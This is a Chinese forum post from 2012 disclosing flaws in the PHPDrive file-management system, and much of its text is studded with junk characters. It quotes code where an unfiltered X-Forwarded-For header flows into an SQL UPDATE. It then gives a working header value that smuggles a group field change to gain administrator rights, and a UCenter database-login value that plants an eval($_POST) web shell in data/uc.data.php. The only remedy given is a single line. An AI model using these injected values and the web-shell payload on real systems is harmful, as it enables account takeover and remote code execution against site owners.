PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等9 [& j" Z% l' K- X/ p* {
* C; X3 i$ I3 D8 i# H( Kincludes/user.lib.php- G( L$ Z8 E7 j
行879 ^) e, c+ m- F+ R9 k- }0 C
function get_ip() {- x8 g: y# c8 ]" d: r( x' I
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
; V1 i6 P. B3 r8 P x2 x在用户注册与登录 处module/disk/account.lead.php
( m+ M9 {( Z* H- U+ \% o9 b8 w198行 ' H, n9 X6 n! S, G1 ^& `
//更新本次登录IP和时间
- z. c! g0 B5 ?& }/ d $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
- K$ Q7 d" f2 T- v% F( y由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
" n/ c2 }, Q+ h- k5 W% @实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.% A4 h, [; }. b8 A, i
后台getshell:* V5 ^" J1 v8 C3 j0 ]9 j
在UCenter设置处,将UC数据库登录名填写为& ^) R. z1 @% D, I
$ a: W7 w. q' U6 t! Z. Aroot’);eval($_POST[DisKill]);?>/*+ S) P$ S! T8 k
可以得到一个shell,位置在 data/uc.data.php
8 `: N6 ^' L* h* K1 B3 V" d% A/ z, K9 S. r j
修复:过滤注入
) D# G2 J$ Y. z; J) o ?# m2 ^5 M2 S& F" ]5 Z# l
|
发表于 2012-12-31 09:18:34
收藏
支持
反对